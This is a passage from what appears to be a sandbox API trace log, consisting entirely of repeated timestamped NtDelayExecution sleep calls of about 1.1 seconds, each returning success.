(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.603] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.643] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.675] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.844] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.891] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.975] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0160.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.022] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.026] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.059] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.075] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.124] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.127] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.207] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.223] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.244] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.260] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0161.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.264] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.335] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.369] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.432] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.460] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0162.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.096] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.100] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.111] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.123] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.149] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.156] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.163] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.174] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.184] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.188] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.196] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.200] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.208] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.212] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.215] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.219] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.224] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.235] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.238] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.241] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.246] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.253] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.344] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.353] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.442] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.454] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.457] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.463] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.466] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.524] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.535] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.555] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.588] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.609] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.615] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.631] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.655] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.668] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.680] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.681] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.688] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.691] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.695] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.717] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.735] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0163.743] NtDelayExecution 